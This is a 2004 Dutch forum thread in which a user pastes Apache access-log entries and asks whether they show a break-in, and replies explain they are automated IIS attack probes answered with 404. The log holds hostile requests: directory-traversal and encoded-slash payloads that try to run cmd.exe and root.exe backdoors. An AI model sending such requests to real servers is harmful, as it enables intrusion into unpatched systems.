Toon posts:

[apache] inbraak?

Pagina: 1
Acties:
  • 36 views sinds 30-01-2008

zaterdag 20 november 2004 17:33

Acties:

Verwijderd

Topicstarter
wat betekend dit ? stond in mijn apache access log.

213.114.144.86 - - [19/Nov/2004:14:36:32 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
213.114.144.86 - - [19/Nov/2004:14:36:32 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280
213.114.144.86 - - [19/Nov/2004:14:36:32 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
213.114.144.86 - - [19/Nov/2004:14:36:32 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
213.114.144.86 - - [19/Nov/2004:14:36:32 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
213.114.144.86 - - [19/Nov/2004:14:36:32 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
213.114.144.86 - - [19/Nov/2004:14:36:33 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304

zaterdag 20 november 2004 17:34

Acties:
  • job
  • Registratie: Februari 2002
  • Laatst online: 17-05 00:37

job

Dat zijn hackpogingen door een scriptkiddie of een virus/trojan.
Niets aan het handje aangezien je server gewoon een 404 terug stuurt.

zaterdag 20 november 2004 17:35

Acties:
  • Icey
  • Registratie: November 2001
  • Laatst online: 15-05 16:24

Icey

JE server geeft een 404 terug, niks aan de hand dus..

Typisch geval van lamers die microsoft webserver proberen te kraken (als ze ongepatched zijn).

zaterdag 20 november 2004 17:37

Acties:
  • SSH
  • Registratie: Januari 2004
  • Niet online

SSH

. . . . . . . .

voor de stats, draai je win of wat anders?

zaterdag 20 november 2004 17:54

Acties:

Verwijderd

Topicstarter
toch stond er 3 bestandjes in mijn documenten map.
draai windows media edition (sp2) met call of duty server. en apache voor de
statistieken server.

nu maar ff uitgedaan. :(

zaterdag 20 november 2004 17:58

Acties:

Verwijderd

Het zijn gewoon script die zoeken naar lekken op internet om ftp server op te zetten voor warez. Maar wat jij ziet zijn vooral hacks voor IIS, dus niet zoeen probleem.

update anders naar laatste versie van apache, dan zit je altijd goed. Want zijn meestal oude hacks.

[ Voor 24% gewijzigd door Verwijderd op 20-11-2004 17:59 ]

zaterdag 20 november 2004 18:01

Acties:
  • curry684
  • Registratie: Juni 2000
  • Laatst online: 12-05 22:23

curry684

left part of the evil twins

Als je al concrete vragen hebt over beveiliging hoort dat wonderlijk genoeg in Beveiliging & Virussen, maar dit is gewoon 'logje dumpen' waar je met een korte Google-tocht ook wel antwoord op had kunnen vinden. Schluss dus :)

Professionele website nodig?

Pagina: 1

Dit topic is gesloten.